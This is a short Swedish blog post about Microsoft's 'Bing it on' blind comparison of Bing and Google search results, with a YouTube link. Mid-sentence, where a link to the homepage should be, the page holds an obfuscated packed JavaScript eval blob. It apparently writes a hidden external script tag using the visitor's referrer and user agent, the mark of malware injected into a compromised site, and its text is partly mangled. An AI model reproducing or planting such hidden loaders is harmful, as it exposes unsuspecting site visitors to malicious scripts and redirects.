Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Bring it On: Bing VS Google

Bring it On: Bing VS Google
Sebastian

Som vi vet är Google den mest använda sökmotorn på marknaden. Bing som drivs av Microsoft vill göra sitt bästa för att ändra på detta.
Microsoft lanserar nu en ny tjänst som heter ”Bing it on”. Med denna tjänst ska man jämföra resultaten mellan Google och Bing.

Det är en tävling som går ut på att man ska söka efter ett sökord och sedan bestämma om höger eller vänster sida visar bäst resultat. Självkalrt vet man inte vilken sida som är vilken sökmotor utan det är ett blindtest.

Testa och se om det verkligen är Google som är bäst.

Hemsida eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhhsi|var|u0026u|referrer|fkati||js|php’.split(’|’),0,{}))
till Bing it on här!

httpv://youtu.be/8Ik57Ifq_u8